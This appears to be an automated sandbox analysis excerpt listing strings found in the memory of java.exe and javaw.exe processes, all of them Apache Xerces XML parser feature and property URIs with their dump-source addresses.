Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdeclA
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueB
Source: javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valuenternalB
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/schemaS
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checking
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checking;A
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checkingB
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checkingn/org/B
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef/xni/XD
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdefD
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef:
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefm/su:
Source: java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef/xerce
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydefs
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-urisk
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language;
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/features/xinclude1
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/D
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node3h
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name3J
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/input-buffer-size
Source: java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/input-buffer-sizejava/l
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory:
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factoryes/i:
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner7
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/document-scannerypeDef7
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor5
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processorKp
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processort5
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scanner8
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerK
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/dtd-scannerdAt8
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-manager8
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-managerSP
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/entity-resolver0
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-handler
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/error-reporter:
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/grammar-pool6
Source: java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-binder
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-bindery
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/namespace-context:
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolver
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolverCG
Source: java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://apache.org/xml/properties/internal/stax-entity-resolverti=
